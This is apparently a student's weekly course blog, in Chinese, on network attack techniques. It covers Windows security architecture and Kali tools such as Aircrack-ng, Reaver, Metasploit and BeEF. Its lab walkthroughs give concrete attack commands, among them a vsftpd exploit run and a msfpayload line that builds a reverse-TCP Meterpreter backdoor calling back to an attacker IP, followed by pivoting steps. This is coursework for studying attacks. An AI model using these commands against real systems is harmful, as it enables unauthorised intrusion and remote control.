第6周错题分析
1、使用Linux命令od -tcx1 Hello.java或od -tc -tcx1 Hello.java可以ASCII码和十六进制单字节方法输出Hello.java的内容。(-b是以八进制输出)
2、ARP欺骗不能破坏信息的完整性,破坏了信息的可用性。
3、中间人攻击可以破坏信息的机密性和完整性。(P140)
4、防火墙部署方式中,包过滤路由器和双宿主堡垒主机不能实现网络层和应用层的双重安全。
5、根据工作的网络协议层次,防火墙技术中工作网络层的是包过滤。(电路级网关在传输层;应用层代理在应用层;基于状态检测的包过滤涉及到传输层)
6、网络安全的动态安全模型的PDR中没有Policy,它在P2DP模型中。
教材学习
第七章 Windows操作系统安全防护
- Windows操作系统框架
- Windows操作系统的发展与现状
Windows在桌面操作系统中占有非常高的市场份额,Windows XP系统在国内仍有大量的用户 - Windows操作系统基本结构
1、Windows操作系统内核基本模块:Windows执行体、Windows内核体、设备驱动程序、硬件抽象层、Windows窗口与图形界面接口内核实现代码。
2、Windows操作系统在用户态的代码模块:系统支持进程、环境子系统服务进程、服务进程、用户应用软件、核心子系统DLL。
3、核心机制:Windows进程和线程管理机制、Windows内存管理机制、Windows文件管理机制、Windows注册表管理机制、Windows的网络机制。
Windows系统的网络结构,从OSI网络参考模型的物理层到应用层,各层对应的Windows网络组件模块包括:
①网卡硬件设备驱动程序,位于OSI物理层
②NDIS库及miniport驱动程序,位于OSI链路层
③TDI传输层,也被称为网络协议驱动,位于OSI网络层与传输层
④网络API DLL 及TDI客户端,对应OSI会话层与表示层
⑥网络应用程序与服务进程,对应OSI应用层
- Windows操作系统的发展与现状
- Windows操作系统的安全体系结构与机制
- Windows安全体系结构
基于引用监控器(Reference Monitor)模型来实现基本的对象安全模型。最核心的是位于内核中的SRM(Security Reference Monitor)安全引用监控器,以及位于用户态的LSASS安全服务。 - Windows身份认证机制
分为用户,用户组,和计算机三大类。对于每个安全主体,以时间和空间上都全局唯一的SID安全标识符来进行标识。
Windows用户密码经过加密处理后被保存于SAM或者活动目录AD中,其中本地用户账户口令信息经过不可逆的128位随机秘钥Hash加密后存储在SAM文件中。
Windows进程、GINA图形化登录窗口,与LSASS服务通过协作来完成本地身份认证过程。 - Windows授权与访问控制机制
Windows授权与访问控制机制是基于引用监控器模型,由内核中的SRM模块与用户态的LSASS服务共同来实施。
Windows对于系统中所有需要保护的资源都抽象成对象,而对每个对象会关联一个SD安全描述符(Security Descriptor)都会关联一个对象描述符,有以下属性组成:Owner SID、Group SID、DACL 自主访问控制列表、SACL 系统审计访问控制列表。 - Windows安全审计机制
系统审计策略在本地安全策略中由系统管理员定义,来确定系统对哪些事件进行记录。 - Windows的其他安全机制
Windows安全中心中集成了对于保护Windows系统安全稳定运行最为关键的三项安全措施:防火墙,补丁自动更新,以及病毒防护。除了安全中心外,Windows的安全特性还包括IPSec加密与验证机制、EFS加密文件系统、Windows文件保护机制、捆绑的IE浏览器所提供的隐私保护与浏览安全保护机制等。
- Windows安全体系结构
- Windows远程安全攻防技术
Windows远程攻击技术可分为:远程口令猜测与破解攻击、攻击Windows网络服务、攻击Windows客户端及用户- Windows系统的安全漏洞生命周期
Windows安全漏洞发现、利用与修补过程
安全漏洞公开披露信息库:几个知名的通用漏洞信息库:CVE、NVD、SecurityFocus、OSVDB等。
针对特定目标的渗透测试攻击过程:①漏洞扫描测试②查找针对发现漏洞的渗透代码③实施渗透测试
使用Metasploit软件实施渗透测试
Metasploit是完全开源的渗透测试软件。采用开发框架和模块组件的可扩展模型,以Ruby语言编写的Metasploit Framework(MSF)库作为整个软件的基础核心,为渗透测试组件的开发与测试提供平台;模块组件是真正实施渗透攻击的代码。
Metasploit提供了CLI、Console、Web和GUI四种不同的用户交互接口,其中Console终端是比较常用的方式。 - Windows远程口令猜测与破解攻击
远程口令自猜测
远程口令字交换通信窃听与破解
远程口令猜测与破解防范措施 - Windows网络服务远程渗透攻击
Windows操作系统默认开放135(TCP),137(UDP),139(TCP)与445(TCP)端口,对应的网络服务为MSRPC与过程调用服务,NetBIOS网络基本输入输出系统服务和SMB文件与打印机共享服务。
针对NetBIOS网络服务的著名漏洞及攻击
针对SMB网络服务的著名漏洞及攻击
针对MSRPC网络服务的著名漏洞及攻击
针对Windows系统上微软网络服务的远程渗透攻击
针对Windows系统上第三方网络服务的远程渗透攻击
网络服务远程渗透攻击防范措施
- Windows系统的安全漏洞生命周期
- Windows本地安全攻防技术
- Windows本地特权提升
终极特权:Administrator或者Local System账户。从受限用户权限尝试获得特权账户的攻击技术也被称为特权提升。 - Windows敏感信息窃取
Windows系统口令字密文提取技术
Windows系统口令字破解技术
用户敏感数据窃取
本地敏感信息窃取防范措施 - Windows消踪灭迹
关闭审计功能
清理事件日志
针对消踪灭迹的防范措施 - Windows远程控制与后门程序
命令行远程控制工具
图形化远程控制工具
针对后门程序防范措施
- Windows本地特权提升
视频学习
Kali无线安全分析工具
RFID/NFC工具
与之相关的是IC卡的攻击与破解,饭卡、房卡、水卡都可以成为攻击测试的目标。
软件定义无线电
参考网站:http://geekcar.net/archives/7748
蓝牙工具集
无线网络分析工具
BackTrack系列曾以此闻名,包括Aircrack-ng无线网络分析套件等工具
1、Aircrack
Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能:网络侦测、数据包嗅探、WEP和WPA/WPA-2破解。
下载地址:http://www.aircrack-ng.org/
2、Cowpatty,一款知名的WPA-PSK握手包密码破解工具
3、EAPMD5PASS针对EAPMD5的密码破解工具
4、fern-wifi-cracker有图形化界面,使用Python写的
可把外置的无线网卡勾选到Kali下面
5、MDK3,是无线DOS攻击测试工具,能发起Beacon Flood、Authentication DoS等模式的攻击,还具有针对
隐藏ESSID的暴力探测模式、802.1X渗透测试、WIDS干扰等功能。
6、wifite,自动无线网审计工具,可以完成自动化破解。Python脚本编写,结合Aircrack-ng套件和Reaver工具。
7、Reaver,对开启WPS的路由器PIN码进行破解。大部分路由器的WPS都是开启的。
关于PIN码破解,参考:http://blog.csdn.net/tinyeyeser/article/details/17127805
BSSID 是指站点的 MAC 地址.
Kali 漏洞利用之检索与利用
1、searchsploit可以借助关键词搜索漏洞信息以及漏洞对应的exp
searchsploit wordpress
列出了漏洞和文件地址
查看列出的文件,例:
2、ikat自动化开启不同的exp。等待目标访问中招。
3、termineter旨在评估智能电表的安全性
Kali 漏洞利用之Metasploit基础
Metasploit在渗透测试中经常被用到。这套软件包括了很多工具,这些工具组成了一个完整的攻击框架。
1、启动服务
在Kali中使用Metasploit,需要先开启PostgreSQL数据库服务和metasploit服务,然后就可以利用msf数据库查询exploit和记录。
2、路径介绍
Kali中msf的路径为/usr/share/metasploit-framework
3、基本命令
msfpayload:用来生成payload或者shellcode。 搜索可以用msfpayload -l |gre[ "windows"查询; -o选项可以列出payload所需的参数。
msfencode:msf中的编码器,早期用来绕过AV(杀毒软件),现常用msfpayload与它编码避免exploit的坏字符串。
msfconsole:开启metasploit的console。
输入msfconsole,打开msf
4、测试示例:发现漏洞,搜索exploit
nmap -sV 222.28.136.171
可以看到21端口开放的是ftp服务,用的版本是vsftpd 2.3.4
此版本是否存在漏洞,在msf里用search vsftpd搜索一下
发现有匹配项
5、测试示例:选择exploit,查看参数
进入exploit时发生点小问题,检查之后发现是自己输入错误,改正后正确进入
查看参数,发现RHOST的参数还未设置,接下来为其设置参数set RHOST 222.28.136.171
6、测试示例:选择payload
设置好之后,show options查看参数,发现没有要设置的参数了
8、执行攻击
输入exploit即可进行攻击测试,如果成功,将返回一个shell:
此时可查看id,ip地址,还有一些文件信息等,可获取目标主机的权限
Kali漏洞利用之Meterpreter介绍
生成Meterpreter后门;打开MSF,开启监听(选择exploit/multi/handler);在目标机器上执行door.exe;
msfpayload windows/meterpreter/reverse_tcp LHOST=222.28.136.234 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe /* 查看自己的IP地址为222.28.136.234,LHOST、LPORT为reverse_tcp的参数,可以在msf里查看到(记得把服务启动)*/
用use exploit/multi/handler来接收返回的连接
设置reverse_tcp的LHOST、LPORT参数
此时执行生成后门的命令
生成了door.exe文件
Kali漏洞利用之Metasploit后渗透测试
在跳板获取一定权限后需要积极地向内网主机权限发展,获取指定的目标信息,探查系统漏洞,借助msf已经得到的Meterpreter后门,可以使系列的操作更容易。
1、查看当前网卡、网段信息(使用ifconfig)。可查看到三个网卡,一个是本地网卡,另一个是我们能访问的网卡,还有一个网卡具有内网IP(访问不到,可以ping以下试试)。
2、添加路由表run autoroute -s 10.0.0.1可以使用msf中的模块跨网段攻击或扫描。可通过脚本autoroute快速添加。
3、开socket代理,通过使用auxiliary/server/socks4a模块,创建一个socks代理,可以为浏览器,sqlmap,nmap使用。通过代理即可访问内网计算机。
4、通过background和session -i可以自由切换进入session。
5、输入run可以看到在meterpreter上可以做的很多命令。
6、通过run post/可以看到后渗透测试模块
7、获取内网信息run arp_scanner -r 10.0.0.1/24
8、也可以上传文件,做端口转发后进行后续测试,例如upload lcx.exe c:\传送文件到c盘根目录。
Kali漏洞利用之BeeF
1、在命令行下启动BeeFbeef-xss
2、假设被测试主机由于XSS漏洞请求到http://127.0.0.1:3000/demos/basic.html
此时页面左侧就会多出一项在线主机:
在此,输入的是hello world,如下返回成功!
5、Proxy功能(代理功能)
选中目标主机,点右键,在菜单中选中Use as Proxy;然后在Rider选项卡中的Forge Request编辑并发送想要发送的内容。
6、BeEF默认是不加载Metasploit的,如果要使用Metasploit丰富的攻击模块,需要做些配置.
默认:
配置:
首先打开beef xss目录
cd /usr/share/beef-xss/
ls
nano config.yaml /* 编辑一下,可以看到有很多配置信息,包括用户名、密码都可以在这设置,在此将Metasploit的false修改为true */
clear
保证此处IP等信息设置正确(不适用127.0.0.1,需使用本机IP),并修改Custom路径:
cd extensions/metasploit/
ls
nano config.yaml /* 将host和callback_host行的IP修改为本机IP,并修改custom路径为/usr/share/metasploit-framework/ */
配置好后打开msfconsole,运行命令:
load msgrpc ServerHost=222.28.136.234 Pass=abc123
执行./beef -x
重新加载Metasploit的exploit模块
加载之后,重启下服务
service beef-xss restart
此时再访问以下之前的页面,发现无法连接,稍等片刻,使用默认用户密码登录进去。发现Metasploit下多了许多模块:
进度
| 视频学习(新增/累计) | 教材学习 | 博客量(新增/累计) | |
|---|---|---|---|
| 目标 | 34个视频 | 12章(网络攻击技术与实践) | |
| 第一周 | (实验楼学习) | (实验楼学习) | 1/1 |
| 第二周 | 5/5 | 第1、2章 | 1/2 |
| 第三周 | 5/10 | 第3章 | 1/3 |
| 第四周 | 5/15 | 第4章 | 1/4 |
| 第五周 | 5/20 | 第11、12章 | 2/6 |
| 第六周 | 5/25 | 第5、6章 | 1/7 |
| 第七周 | 5/30 | 第7章 | 1/8 |